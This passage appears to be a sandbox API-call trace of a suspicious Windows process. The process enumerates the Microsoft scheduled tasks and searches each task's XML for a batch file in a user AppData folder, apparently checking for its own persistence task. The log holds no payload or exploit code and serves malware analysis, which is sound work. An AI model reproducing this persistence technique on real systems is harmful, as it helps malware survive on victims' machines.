$(@%SystemRoot%\\System32\\wuautoappupdate.dll,-603)\r\n \\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT4H\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {A6BA00FE-40E8-477C-B713-C64A14F18ADB}\r\n \r\n \r\n") returned 0x0 [0162.511] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;SY)(A;;FA;;;BA)(A;;FRFX;;;IU)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-601)\r\n $(@%SystemRoot%\\System32\\wuautoappupdate.dll,-603)\r\n \\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT4H\r\n Parallel\r\n true\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT4H\r\n \r\n PT4H\r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {A6BA00FE-40E8-477C-B713-C64A14F18ADB}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.511] IUnknown:Release (This=0x929600) returned 0x0 [0162.511] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.511] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Scheduled Start") returned 0x0 [0162.511] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n Microsoft Corporation.\r\n Microsoft Corporation.\r\n This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.\r\n \\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2022-03-26T20:00:38+02:00\r\n PT1M\r\n \r\n \r\n false\r\n ConsoleDisconnect\r\n \r\n \r\n false\r\n RemoteDisconnect\r\n \r\n \r\n false\r\n 7508BCA3380C960C\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\sc.exe\r\n start wuauserv\r\n \r\n \r\n") returned 0x0 [0162.512] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation.\r\n Microsoft Corporation.\r\n This task is used to start the Windows Update service when needed to perform scheduled operations such as scans.\r\n \\Microsoft\\Windows\\WindowsUpdate\\Scheduled Start\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n IgnoreNew\r\n true\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 2022-03-26T20:00:38+02:00\r\n PT1M\r\n \r\n \r\n false\r\n ConsoleDisconnect\r\n \r\n \r\n false\r\n RemoteDisconnect\r\n \r\n \r\n false\r\n 7508BCA3380C960C\r\n 01\r\n \r\n \r\n \r\n \r\n C:\\Windows\\system32\\sc.exe\r\n start wuauserv\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.512] IUnknown:Release (This=0x929600) returned 0x0 [0162.512] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.512] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="sih") returned 0x0 [0162.512] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-102)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sih\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT20H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n \r\n \r\n") returned 0x0 [0162.513] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-102)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sih\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n 2014-01-01T02:00:00+02:00\r\n \r\n PT20H\r\n \r\n PT4H\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.513] IUnknown:Release (This=0x929600) returned 0x0 [0162.513] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x337b, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.513] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="sihboot") returned 0x0 [0162.513] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-103)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sihboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2M\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n /boot\r\n \r\n \r\n") returned 0x0 [0162.513] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FAFRFX;;;SY)(A;;FAFRFX;;;LS)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-101)\r\n $(@%SystemRoot%\\System32\\sihclient.exe,-103)\r\n \\Microsoft\\Windows\\WindowsUpdate\\sihboot\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT2M\r\n true\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n false\r\n \r\n \r\n \r\n \r\n %systemroot%\\System32\\sihclient.exe\r\n /boot\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.513] IUnknown:Release (This=0x929600) returned 0x0 [0162.514] IUnknown:Release (This=0x929470) returned 0x0 [0162.514] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.514] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.514] IUnknown:Release (This=0x929470) returned 0x0 [0162.514] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.514] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x50, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.514] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.514] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.514] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295e0) returned 0x0 [0162.514] IRegisteredTask:get_Name (in: This=0x9295e0, pName=0xce058 | out: pName=0xce058*="CacheTask") returned 0x0 [0162.515] IRegisteredTask:get_Xml (in: This=0x9295e0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x001200a9;;;BU)(A;;0x001200a9;;;WD)(A;;0x001200a9;;;LW)\r\n $(@%systemroot%\\system32\\wininet.dll,-16000)\r\n $(@%systemroot%\\system32\\wininet.dll,-16001)\r\n \\Microsoft\\Windows\\Wininet\\CacheTask\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {0358B920-0AC7-461F-98F4-58E32CD89148}\r\n \r\n \r\n") returned 0x0 [0162.516] StrStrIW (lpFirst="\r\n\r\n \r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x001200a9;;;BU)(A;;0x001200a9;;;WD)(A;;0x001200a9;;;LW)\r\n $(@%systemroot%\\system32\\wininet.dll,-16000)\r\n $(@%systemroot%\\system32\\wininet.dll,-16001)\r\n \\Microsoft\\Windows\\Wininet\\CacheTask\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n false\r\n false\r\n PT0S\r\n Parallel\r\n \r\n false\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n \r\n \r\n \r\n {0358B920-0AC7-461F-98F4-58E32CD89148}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.516] IUnknown:Release (This=0x9295e0) returned 0x0 [0162.516] IUnknown:Release (This=0x929460) returned 0x0 [0162.516] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.516] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.516] IUnknown:Release (This=0x929460) returned 0x0 [0162.516] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.516] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x51, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.516] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.517] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.517] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.517] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="WIM-Hash-Management") returned 0x0 [0162.517] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Management\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA32B188341\r\n 01\r\n \r\n \r\n 7528BCA32B188341\r\n 03\r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n") returned 0x0 [0162.517] StrStrIW (lpFirst="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Management\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n Queue\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n 7518BCA32B188341\r\n 01\r\n \r\n \r\n 7528BCA32B188341\r\n 03\r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.517] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.518] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.518] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="WIM-Hash-Validation") returned 0x0 [0162.518] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n") returned 0x0 [0162.518] StrStrIW (lpFirst="\r\n\r\n \r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-601)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-600)\r\n $(@%SystemRoot%\\system32\\WofTasks.dll,-602)\r\n \\Microsoft\\Windows\\WOF\\WIM-Hash-Validation\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n true\r\n true\r\n false\r\n IgnoreNew\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n \r\n \r\n \r\n \r\n \r\n {B7BFFB5A-EFA8-4D8C-BBDE-C8D5FAAF54A1}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.518] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.518] IUnknown:Release (This=0x929460) returned 0x0 [0162.518] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929460) returned 0x0 [0162.519] ITaskFolderCollection:get_Count (in: This=0x929460, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.519] IUnknown:Release (This=0x929460) returned 0x0 [0162.519] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.519] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x52, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.519] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.519] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.519] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.519] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="Work Folders Logon Synchronization") returned 0x0 [0162.519] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18000)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18001)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18002)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\r\n \r\n \r\n \r\n") returned 0x0 [0162.520] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18000)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18001)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18002)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Logon Synchronization\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n false\r\n false\r\n P1D\r\n IgnoreNew\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT5M\r\n \r\n \r\n \r\n \r\n {97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\r\n \r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.520] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.520] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x7f, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295f0) returned 0x0 [0162.520] IRegisteredTask:get_Name (in: This=0x9295f0, pName=0xce058 | out: pName=0xce058*="Work Folders Maintenance Work") returned 0x0 [0162.520] IRegisteredTask:get_Xml (in: This=0x9295f0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18004)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18005)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18006)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Maintenance Work\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n P1D\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {63260BCE-A3FB-4A34-AA51-D4D8E877B62B}\r\n \r\n \r\n") returned 0x0 [0162.521] StrStrIW (lpFirst="\r\n\r\n \r\n 1.0\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18004)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18005)\r\n $(@%systemroot%\\system32\\WorkFoldersShell.dll,-18006)\r\n \\Microsoft\\Windows\\Work Folders\\Work Folders Maintenance Work\r\n \r\n \r\n \r\n S-1-5-4\r\n \r\n \r\n \r\n true\r\n true\r\n P1D\r\n IgnoreNew\r\n 5\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n PT30M\r\n \r\n \r\n \r\n \r\n {63260BCE-A3FB-4A34-AA51-D4D8E877B62B}\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.521] IUnknown:Release (This=0x9295f0) returned 0x0 [0162.521] IUnknown:Release (This=0x929470) returned 0x0 [0162.521] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.522] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.522] IUnknown:Release (This=0x929470) returned 0x0 [0162.522] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.522] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x53, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.522] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929470) returned 0x0 [0162.522] IRegisteredTaskCollection:get_Count (in: This=0x929470, pCount=0xce048 | out: pCount=0xce048*=1) returned 0x0 [0162.522] IRegisteredTaskCollection:get_Item (in: This=0x929470, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x929600) returned 0x0 [0162.522] IRegisteredTask:get_Name (in: This=0x929600, pName=0xce058 | out: pName=0xce058*="Automatic-Device-Join") returned 0x0 [0162.522] IRegisteredTask:get_Xml (in: This=0x929600, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n D:AI(A;;FA;;;NS)(A;;GA;;;SY)(A;ID;FA;;;BA)(A;ID;GRGX;;;AU)\r\n $(@%SystemRoot%\\system32\\dsregcmd.exe,-101)\r\n \\Microsoft\\Windows\\Workplace Join\\Automatic-Device-Join\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dsregcmd.exe\r\n \r\n \r\n") returned 0x0 [0162.523] StrStrIW (lpFirst="\r\n\r\n \r\n D:AI(A;;FA;;;NS)(A;;GA;;;SY)(A;ID;FA;;;BA)(A;ID;GRGX;;;AU)\r\n $(@%SystemRoot%\\system32\\dsregcmd.exe,-101)\r\n \\Microsoft\\Windows\\Workplace Join\\Automatic-Device-Join\r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n PT5M\r\n Queue\r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n \r\n \r\n PT1M\r\n \r\n \r\n \r\n \r\n %SystemRoot%\\System32\\dsregcmd.exe\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.523] IUnknown:Release (This=0x929600) returned 0x0 [0162.523] IUnknown:Release (This=0x929470) returned 0x0 [0162.523] ITaskFolder:GetFolders (in: This=0x9293a0, flags=0, ppFolders=0xce038 | out: ppFolders=0xce038*=0x929470) returned 0x0 [0162.523] ITaskFolderCollection:get_Count (in: This=0x929470, pCount=0xce044 | out: pCount=0xce044*=0) returned 0x0 [0162.523] IUnknown:Release (This=0x929470) returned 0x0 [0162.523] TaskScheduler:IUnknown:Release (This=0x9293a0) returned 0x0 [0162.523] ITaskFolderCollection:get_Item (in: This=0x929220, index=0xce230*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x54, varVal2=0x0), ppFolder=0xce1e0 | out: ppFolder=0xce1e0*=0x9293a0) returned 0x0 [0162.523] ITaskFolder:GetTasks (in: This=0x9293a0, flags=1, ppTasks=0xce050 | out: ppTasks=0xce050*=0x929460) returned 0x0 [0162.524] IRegisteredTaskCollection:get_Count (in: This=0x929460, pCount=0xce048 | out: pCount=0xce048*=2) returned 0x0 [0162.524] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.524] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="License Validation") returned 0x0 [0162.524] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-123)\r\n \\Microsoft\\Windows\\WS\\License Validation\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 255\r\n P31D\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n 2004-01-02T06:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n rundll32.exe\r\n WSClient.dll,WSpTLR licensing\r\n \r\n \r\n") returned 0x0 [0162.525] StrStrIW (lpFirst="\r\n\r\n \r\n 2010-10-27T17:18:44.0816608\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;GRGX;;;SU)(A;;FA;;;S-1-5-80-1227353651-1023108616-160957920-2792958081-1972711695)(A;;FR;;;S-1-5-87-1452649159-2109950929-2856838567-3638795029-1283063528)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-122)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-120)\r\n $(@%SystemRoot%\\system32\\wsservice.dll,-123)\r\n \\Microsoft\\Windows\\WS\\License Validation\r\n \r\n \r\n \r\n S-1-5-19\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n IgnoreNew\r\n \r\n 255\r\n P31D\r\n \r\n true\r\n \r\n true\r\n false\r\n \r\n true\r\n \r\n P1D\r\n P2D\r\n \r\n \r\n \r\n \r\n 2004-01-02T06:00:00\r\n \r\n PT6H\r\n \r\n \r\n \r\n \r\n \r\n rundll32.exe\r\n WSClient.dll,WSpTLR licensing\r\n \r\n \r\n", lpSrch="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\browDownload55\\cmd01.bat") returned 0x0 [0162.525] IUnknown:Release (This=0x9295d0) returned 0x0 [0162.525] IRegisteredTaskCollection:get_Item (in: This=0x929460, index=0xce098*(varType=0x3, wReserved1=0x3335, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), ppRegisteredTask=0xce038 | out: ppRegisteredTask=0xce038*=0x9295d0) returned 0x0 [0162.525] IRegisteredTask:get_Name (in: This=0x9295d0, pName=0xce058 | out: pName=0xce058*="WSTask") returned 0x0 [0162.525] IRegisteredTask:get_Xml (in: This=0x9295d0, pXml=0xce030 | out: pXml=0xce030*="\r\n\r\n \r\n 